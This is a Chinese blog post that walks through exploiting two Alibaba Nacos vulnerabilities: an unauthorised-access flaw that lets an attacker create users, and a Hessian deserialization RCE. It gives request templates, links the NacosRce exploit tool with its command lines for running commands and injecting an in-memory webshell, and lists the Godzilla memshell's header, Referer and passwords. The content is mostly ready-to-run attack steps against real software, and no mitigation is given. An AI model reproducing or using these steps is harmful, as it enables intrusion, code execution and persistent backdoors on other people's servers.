websec80

  博客园  :: 首页  :: 新随笔  :: 联系 ::  :: 管理
  97 随笔 :: 50 文章 :: 3 评论 :: 14万 阅读

漏洞描述:2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作

影响版本:
Nacos <= 2.0.0-ALPHA.1

漏洞地址:GET http://IP:端口/nacos/v1/auth/users?pageNo=1&pageSize=9

利用方式:POST http://IP:端口/nacos/v1/auth/users?username=test1&password=test1

 

加账户密码登录

 

 

描述

Nacos 在处理某些基于 Jraft 的请求时,采用 Hessian 进行反序列化,但并未设置限制,导致应用存在远程代码执行(RCE)漏洞。

影响版本

1.4.0 <= Nacos < 1.4.6 使用cluster集群模式运行
2.0.0 <= Nacos < 2.2.3 任意模式启动

复现

工具

https://github.com/c0olw/NacosRce/

说明

自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 "Command"
    java -jar NacosRce.jar http://192.168.90.1:8848/nacos  7848 "whoami"
只注入内存马
   java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell

进行rce

java -jar NacosRce.jar http://172.16.10.14:8848/nacos 7848 "whoami"

 

**食用方式 **

自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 "Command"

java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 "whoami"
只注入内存马

java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell

 

哥斯拉内存马:
1、需要设置请求头x-client-data:godzilla
2、设置Referer:https://www.google.com/
3、路径随意
4、密码是pass 和 key

posted on   websec80  阅读(2238)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统
点击右上角即可分享
微信分享提示